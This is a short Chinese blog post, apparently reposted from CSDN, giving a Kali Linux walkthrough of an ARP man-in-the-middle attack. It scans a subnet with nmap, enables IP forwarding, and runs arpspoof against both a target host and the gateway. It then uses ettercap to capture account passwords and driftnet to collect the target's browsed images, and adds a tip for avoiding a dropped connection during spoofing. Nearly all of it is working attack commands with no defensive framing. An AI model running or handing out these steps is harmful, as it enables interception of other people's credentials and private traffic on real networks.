kali arp中间人攻击

 

先用nmap找到目标(或zenmap等等)

nmap -sP 192.168.0.1-200

192.168.0.105          //(主机A 我自己的电脑)

 

echo 1 > /proc/sys/net/ipv4/ip_forward   //进行IP转发(echo 0即断网)

arpspoof -i <<span class="hljs-name">网卡名> -t <<span class="hljs-name">欺骗的目标> <<span class="hljs-name">我是谁>

arpspoof -i eth0 -t 192.168.0.105 192.168.0.1

// 终端1, 欺骗主机A :我是网关

arpspoof -i eth0 -t 192.168.0.1 192.168.0.105

//终端2, 欺骗网关:我是主机 A

 用 ettercap抓取账号密码

打开一个新终端

ettercap -Tq -i eth0

用driftnet获取目标主机的图片浏览记录

driftnet -i eth0

(eth0为我的笔记本内置网卡名称 USB网卡名称一般为wlan0)

 

echo 1 > /proc/sys/net/ipv4/ip_forward

arpspoof -i eth0 -t 192.168.0.105 192.168.0.1

欺骗时仍造成断网。

解决办法。把靶机ip和网关反一下。

通过欺骗网关可以拿到图片,至于账号密码能不能拿到要看登陆的网站了。

猜你喜欢

转载自blog.csdn.net/cruoni/article/details/80823025